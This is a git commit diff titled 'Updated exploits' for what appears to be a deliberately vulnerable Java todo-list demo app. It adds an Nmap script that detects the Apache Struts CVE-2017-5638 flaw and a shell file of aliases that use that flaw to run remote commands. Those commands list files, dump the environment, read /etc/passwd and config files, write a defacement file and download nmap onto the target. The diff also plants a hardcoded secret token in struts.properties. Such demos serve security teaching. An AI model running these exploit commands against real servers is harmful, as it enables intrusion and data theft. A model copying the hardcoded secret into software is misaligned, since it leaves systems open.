Merge pull request #11 from guypod/master

Updated exploits

Author: guypod

exploits/http-vuln-struts-detection.nse

@@ -0,0 +1,77 @@
+description = [[
+Detects whether the specified URL is vulnerable to the Apache Struts
+Remote Code Execution Vulnerability (CVE-2017-5638).
+]]
+
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+local string = require "string"
+
+---
+-- @usage
+-- nmap -p <port> --script http-vuln-cve2017-5638 <target>
+--
+-- @output
+-- PORT    STATE SERVICE
+-- 80/tcp  open  http
+-- | http-vuln-cve2017-5638:
+-- |   VULNERABLE
+-- |   Apache Struts Remote Code Execution Vulnerability
+-- |     State: VULNERABLE
+-- |     IDs:  CVE:CVE-2017-5638
+-- |
+-- |     Disclosure date: 2017-03-07
+-- |     References:
+-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
+-- |       https://cwiki.apache.org/confluence/display/WW/S2-045
+-- |_      http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
+--
+-- @args http-vuln-cve2017-5638.method The HTTP method for the request. The default method is "GET".
+-- @args http-vuln-cve2017-5638.path The URL path to request. The default path is "/".
+
+author = "Seth Jackson"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = { "vuln" }
+
+portrule = shortport.http
+
+action = function(host, port)
+  local vuln = {
+    title = "Apache Struts Remote Code Execution Vulnerability",
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
+vulnerability via the Content-Type header.
+    ]],
+    IDS = {
+        CVE = "CVE-2017-5638"
+    },
+    references = {
+        'https://cwiki.apache.org/confluence/display/WW/S2-045',
+        'http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html'
+    },
+    dates = {
+        disclosure = { year = '2017', month = '03', day = '07' }
+    }
+  }
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+  local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "GET"
+  local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/"
+  local value = stdnse.generate_random_string(8)
+
+  local header = {
+    ["Content-Type"] = string.format("%%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts', '%s')}.multipart/form-data", value)
+  }
+
+  local response = http.generic_request(host, port, method, path, { header = header })
+
+  if response and response.status == 200 and response.header["x-check-struts"] == value then
+    vuln.state = vulns.STATE.VULN
+  end
+
+  return vuln_report:make_output(vuln)
+end

exploits/loc-stats.txt

@@ -0,0 +1,4 @@
+408 lines of app src code (no deps)
+23 dependencies (libraries) in use
+690,944 lines of dependency code
+691,352 total

exploits/struts-aliases.sh

@@ -0,0 +1,35 @@
+if [ -z "$JAVA_GOOF_HOST" ]; then
+	export JAVA_GOOF_HOST=java-goof.herokuapp.com
+	export JAVA_GOOF_URL=https://$JAVA_GOOF_HOST
+fi
+export JAVA_GOOF_DEBUG=-v
+
+alias struts_base_command="echo \$EXP_MESSAGE'\n\n' &| cat struts-exploit-headers.txt| sed 's/COMMAND/'\$EXP_COMMAND'/' | xargs curl --http1.0 \$JAVA_GOOF_DEBUG $JAVA_GOOF_URL -H"
+
+# Check if struts is there
+alias struts0="nmap  -p 80 --script http-vuln-struts-detection.nse $JAVA_GOOF_HOST"
+
+# List files (simple)
+alias struts1="export EXP_MESSAGE='Getting list of files...'; export EXP_COMMAND='ls -l'; struts_base_command"
+
+# Get env
+alias struts2="export EXP_MESSAGE='Getting environment info...'; export EXP_COMMAND='env'; struts_base_command"
+
+# Get passwd
+alias struts3="export EXP_MESSAGE='Getting password hash file...'; export EXP_COMMAND='cat \/etc\/passwd'; struts_base_command"
+
+# List files - deep
+alias struts4="export EXP_MESSAGE='Getting full list of files...'; export EXP_COMMAND='find .'; struts_base_command"
+
+# Show a sensitive file
+alias struts5="export EXP_MESSAGE='Showing sensitive properties file...'; export EXP_COMMAND='cat .\/target\/tomcat.*\/webapps\/expanded\/WEB-INF\/classes\/struts.properties'; struts_base_command"
+
+# Create a file *********(make sure JAVA_GOOF_TOMCAT_PID is set to the right PID)******
+alias struts6="export EXP_MESSAGE='Create a file at $JAVA_GOOF_URL/static/js/evil.js...'; export export EXP_COMMAND='echo MUHAHAHAHAHAHAHA > .\/target\/tomcat.'\$JAVA_GOOF_TOMCAT_PID'\/webapps\/expanded\/static\/js\/evil.js'; struts_base_command"
+
+# Getting IP Info
+alias struts7="export EXP_MESSAGE='Gathering internal network information...'; export export EXP_COMMAND='ip addr show'; struts_base_command"
+
+# Uploading nmap to do port scanning
+alias struts8="export EXP_MESSAGE='Uploading nmap...'; export export EXP_COMMAND='wget https:\/\/github.com\/andrew-d\/static-binaries\/raw\/master\/binaries\/linux\/x86_64\/nmap'; struts_base_command"
+

todolist-web-common/src/main/resources/todolist.properties

@@ -16,4 +16,4 @@ account.profile.update.success=Your profile has been updated successfully
 account.password.update.success=Your password has been updated successfully
 
 #todo errors
-no.such.todo=No such todo with id: {0}
+no.such.todo=No such todo with id: {0}

todolist-web-struts/.snyk

@@ -0,0 +1,8 @@
+
+# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.
+version: v1.7.1
+# ignores vulnerabilities until expiry date; change duration by modifying expiry date
+ignore: {}
+patch:
+  'SNYK-JAVA-ORGAPACHESTRUTS-30207':
+      patch: 'struts2-core-2.3.20.jar'

todolist-web-struts/src/main/resources/struts.properties

@@ -11,3 +11,6 @@ struts.custom.i18n.resources=todolist
 
 #use Spring as Object Factory
 struts.objectFactory = spring
+
+# Secret token
+secret.token=MySecretTokenForDBAccess